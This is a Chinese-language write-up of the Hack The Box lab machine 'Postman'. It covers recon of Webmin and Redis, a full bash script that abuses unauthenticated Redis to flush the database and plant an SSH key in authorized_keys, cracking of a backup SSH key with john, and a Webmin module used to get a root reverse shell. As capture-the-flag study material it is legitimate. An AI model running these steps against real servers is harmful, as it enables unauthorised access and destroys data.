Postman(HTB)

in Study on Htb

转移了OneNote中的文章 还木有配图

nmap

nmap扫描发现10000上有webmin服务
修改hosts来正常访问
但是发现没有change_password.cgi无法利用exp
又发现redis服务 存在未授权访问漏洞

redis未授权访问

#!/bin/bash
(echo -e "\n\n"; cat /root/.ssh/fucku.pub; echo -e "\n\n") > fuckuredis.txt
redis-cli -h 10.10.10.160 flushall
cat fuckuredis.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save
ssh -i /root/.ssh/fucku redis@10.10.10.160

拿到redis的用户权限 发现/opt/rsa_id.key.bak

使用john破解密码

python /usr/share/john/ssh2john.py ./Matt > ./Mattjohn
john --wordlist=/usr/share/wordlists/rockyou.txt ./Mattjohn

密码为**

尝试登录

直接用私钥登录却不成功 尝试登录redis用户 su Matt成功 读取到user.txt

提权

尝试通过unix/webapp/webmin_upload_exec提权不成功
使用linux/http/webmin_packageup_rce检测通过
手动添加httprawheader后反弹root shell
拿到root.txt

© 2021. All rights reserved.

本站总访问量 Web Analytics

Powered by Hydejack v9.1.2 & Moded by ZYA